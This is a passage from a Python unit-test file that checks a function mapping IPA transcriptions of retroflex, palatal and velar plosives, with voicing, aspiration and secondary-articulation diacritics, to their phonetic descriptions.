self.assertEqual(actual, expected)
def test_ʈ̬ʰ_is_the_representation_of_the_voiced_aspirated_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized retroflex plosive pulmonic egressive consonant
def test_ɖʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖʰʷ")
self.assertEqual(actual, expected)
def test_ɖ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̬ʰʷ")
self.assertEqual(actual, expected)
def test_ʈ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized retroflex plosive pulmonic egressive consonant
def test_ɖʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖʰʲ")
self.assertEqual(actual, expected)
def test_ɖ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̬ʰʲ")
self.assertEqual(actual, expected)
def test_ʈ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized retroflex plosive pulmonic egressive consonant
def test_ɖʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖʰˠ")
self.assertEqual(actual, expected)
def test_ɖ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̬ʰˠ")
self.assertEqual(actual, expected)
def test_ʈ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized retroflex plosive pulmonic egressive consonant
def test_ɖʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖʰˤ")
self.assertEqual(actual, expected)
def test_ɖ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ɖ̬ʰˤ")
self.assertEqual(actual, expected)
def test_ʈ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex plosive pulmonic egressive consonant"
actual = describe_transcription("ʈ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless palatal plosive pulmonic egressive consonant
def test_c_is_the_representation_of_the_voiceless_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c")
self.assertEqual(actual, expected)
def test_c̊_is_the_representation_of_the_voiceless_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̊")
self.assertEqual(actual, expected)
def test_c̥_is_the_representation_of_the_voiceless_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̥")
self.assertEqual(actual, expected)
def test_ɟ̊_is_the_representation_of_the_voiceless_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊")
self.assertEqual(actual, expected)
def test_ɟ̥_is_the_representation_of_the_voiceless_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥")
self.assertEqual(actual, expected)
# voiceless labialized palatal plosive pulmonic egressive consonant
def test_cʷ_is_the_representation_of_the_voiceless_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cʷ")
self.assertEqual(actual, expected)
def test_c̊ʷ_is_the_representation_of_the_voiceless_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̊ʷ")
self.assertEqual(actual, expected)
def test_c̥ʷ_is_the_representation_of_the_voiceless_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̥ʷ")
self.assertEqual(actual, expected)
def test_ɟ̊ʷ_is_the_representation_of_the_voiceless_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ʷ")
self.assertEqual(actual, expected)
def test_ɟ̥ʷ_is_the_representation_of_the_voiceless_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized palatal plosive pulmonic egressive consonant
def test_cʲ_is_the_representation_of_the_voiceless_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cʲ")
self.assertEqual(actual, expected)
def test_c̊ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̊ʲ")
self.assertEqual(actual, expected)
def test_c̥ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̥ʲ")
self.assertEqual(actual, expected)
def test_ɟ̊ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ʲ")
self.assertEqual(actual, expected)
def test_ɟ̥ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized palatal plosive pulmonic egressive consonant
def test_cˠ_is_the_representation_of_the_voiceless_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cˠ")
self.assertEqual(actual, expected)
def test_c̊ˠ_is_the_representation_of_the_voiceless_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̊ˠ")
self.assertEqual(actual, expected)
def test_c̥ˠ_is_the_representation_of_the_voiceless_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̥ˠ")
self.assertEqual(actual, expected)
def test_ɟ̊ˠ_is_the_representation_of_the_voiceless_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ˠ")
self.assertEqual(actual, expected)
def test_ɟ̥ˠ_is_the_representation_of_the_voiceless_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized palatal plosive pulmonic egressive consonant
def test_cˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cˤ")
self.assertEqual(actual, expected)
def test_c̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̊ˤ")
self.assertEqual(actual, expected)
def test_c̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̥ˤ")
self.assertEqual(actual, expected)
def test_ɟ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ˤ")
self.assertEqual(actual, expected)
def test_ɟ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated palatal plosive pulmonic egressive consonant
def test_cʰ_is_the_representation_of_the_voiceless_aspirated_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cʰ")
self.assertEqual(actual, expected)
def test_ɟ̥ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ʰ")
self.assertEqual(actual, expected)
def test_ɟ̊ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized palatal plosive pulmonic egressive consonant
def test_cʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cʰʷ")
self.assertEqual(actual, expected)
def test_ɟ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ɟ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized palatal plosive pulmonic egressive consonant
def test_cʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cʰʲ")
self.assertEqual(actual, expected)
def test_ɟ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ɟ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized palatal plosive pulmonic egressive consonant
def test_cʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cʰˠ")
self.assertEqual(actual, expected)
def test_ɟ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ɟ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized palatal plosive pulmonic egressive consonant
def test_cʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("cʰˤ")
self.assertEqual(actual, expected)
def test_ɟ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɟ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced palatal plosive pulmonic egressive consonant
def test_ɟ_is_the_representation_of_the_voiced_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ")
self.assertEqual(actual, expected)
def test_c̬_is_the_representation_of_the_voiced_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬")
self.assertEqual(actual, expected)
def test_c̬_is_the_representation_of_the_voiced_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬")
self.assertEqual(actual, expected)
# voiced labialized palatal plosive pulmonic egressive consonant
def test_ɟʷ_is_the_representation_of_the_voiced_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟʷ")
self.assertEqual(actual, expected)
def test_c̬ʷ_is_the_representation_of_the_voiced_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʷ")
self.assertEqual(actual, expected)
def test_c̬ʷ_is_the_representation_of_the_voiced_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized palatal plosive pulmonic egressive consonant
def test_ɟʲ_is_the_representation_of_the_voiced_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟʲ")
self.assertEqual(actual, expected)
def test_c̬ʲ_is_the_representation_of_the_voiced_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʲ")
self.assertEqual(actual, expected)
def test_c̬ʲ_is_the_representation_of_the_voiced_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized palatal plosive pulmonic egressive consonant
def test_ɟˠ_is_the_representation_of_the_voiced_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟˠ")
self.assertEqual(actual, expected)
def test_c̬ˠ_is_the_representation_of_the_voiced_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ˠ")
self.assertEqual(actual, expected)
def test_c̬ˠ_is_the_representation_of_the_voiced_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized palatal plosive pulmonic egressive consonant
def test_ɟˤ_is_the_representation_of_the_voiced_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟˤ")
self.assertEqual(actual, expected)
def test_c̬ˤ_is_the_representation_of_the_voiced_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ˤ")
self.assertEqual(actual, expected)
def test_c̬ˤ_is_the_representation_of_the_voiced_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated palatal plosive pulmonic egressive consonant
def test_ɟʰ_is_the_representation_of_the_voiced_aspirated_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟʰ")
self.assertEqual(actual, expected)
def test_ɟ̬ʰ_is_the_representation_of_the_voiced_aspirated_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̬ʰ")
self.assertEqual(actual, expected)
def test_c̬ʰ_is_the_representation_of_the_voiced_aspirated_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized palatal plosive pulmonic egressive consonant
def test_ɟʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟʰʷ")
self.assertEqual(actual, expected)
def test_ɟ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̬ʰʷ")
self.assertEqual(actual, expected)
def test_c̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized palatal plosive pulmonic egressive consonant
def test_ɟʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟʰʲ")
self.assertEqual(actual, expected)
def test_ɟ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̬ʰʲ")
self.assertEqual(actual, expected)
def test_c̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized palatal plosive pulmonic egressive consonant
def test_ɟʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟʰˠ")
self.assertEqual(actual, expected)
def test_ɟ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̬ʰˠ")
self.assertEqual(actual, expected)
def test_c̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized palatal plosive pulmonic egressive consonant
def test_ɟʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟʰˤ")
self.assertEqual(actual, expected)
def test_ɟ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("ɟ̬ʰˤ")
self.assertEqual(actual, expected)
def test_c̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal plosive pulmonic egressive consonant"
actual = describe_transcription("c̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless velar plosive pulmonic egressive consonant
def test_k_is_the_representation_of_the_voiceless_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velar plosive pulmonic egressive consonant"
actual = describe_transcription("k")
self.assertEqual(actual, expected)
def test_k̊_is_the_representation_of_the_voiceless_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̊")
self.assertEqual(actual, expected)
def test_k̥_is_the_representation_of_the_voiceless_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̥")
self.assertEqual(actual, expected)
def test_g̊_is_the_representation_of_the_voiceless_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊")
self.assertEqual(actual, expected)
def test_g̥_is_the_representation_of_the_voiceless_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥")
self.assertEqual(actual, expected)
# voiceless labialized velar plosive pulmonic egressive consonant
def test_kʷ_is_the_representation_of_the_voiceless_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kʷ")
self.assertEqual(actual, expected)
def test_k̊ʷ_is_the_representation_of_the_voiceless_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̊ʷ")
self.assertEqual(actual, expected)
def test_k̥ʷ_is_the_representation_of_the_voiceless_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̥ʷ")
self.assertEqual(actual, expected)
def test_g̊ʷ_is_the_representation_of_the_voiceless_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ʷ")
self.assertEqual(actual, expected)
def test_g̥ʷ_is_the_representation_of_the_voiceless_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized velar plosive pulmonic egressive consonant
def test_kʲ_is_the_representation_of_the_voiceless_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kʲ")
self.assertEqual(actual, expected)
def test_k̊ʲ_is_the_representation_of_the_voiceless_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̊ʲ")
self.assertEqual(actual, expected)
def test_k̥ʲ_is_the_representation_of_the_voiceless_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̥ʲ")
self.assertEqual(actual, expected)
def test_g̊ʲ_is_the_representation_of_the_voiceless_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ʲ")
self.assertEqual(actual, expected)
def test_g̥ʲ_is_the_representation_of_the_voiceless_palatalized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized velar plosive pulmonic egressive consonant
def test_kˠ_is_the_representation_of_the_voiceless_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kˠ")
self.assertEqual(actual, expected)
def test_k̊ˠ_is_the_representation_of_the_voiceless_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̊ˠ")
self.assertEqual(actual, expected)
def test_k̥ˠ_is_the_representation_of_the_voiceless_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̥ˠ")
self.assertEqual(actual, expected)
def test_g̊ˠ_is_the_representation_of_the_voiceless_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ˠ")
self.assertEqual(actual, expected)
def test_g̥ˠ_is_the_representation_of_the_voiceless_velarized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized velar plosive pulmonic egressive consonant
def test_kˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kˤ")
self.assertEqual(actual, expected)
def test_k̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̊ˤ")
self.assertEqual(actual, expected)
def test_k̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("k̥ˤ")
self.assertEqual(actual, expected)
def test_g̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ˤ")
self.assertEqual(actual, expected)
def test_g̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated velar plosive pulmonic egressive consonant
def test_kʰ_is_the_representation_of_the_voiceless_aspirated_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar plosive pulmonic egressive consonant"
actual = describe_transcription("kʰ")
self.assertEqual(actual, expected)
def test_g̥ʰ_is_the_representation_of_the_voiceless_aspirated_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ʰ")
self.assertEqual(actual, expected)
def test_g̊ʰ_is_the_representation_of_the_voiceless_aspirated_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized velar plosive pulmonic egressive consonant
def test_kʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("kʰʷ")
self.assertEqual(actual, expected)
def test_g̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar plosive pulmonic egressive consonant"
actual = describe_transcription("g̥ʰʷ")
self.assertEqual(actual, expected)
def test_g̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar plosive pulmonic egressive consonant"
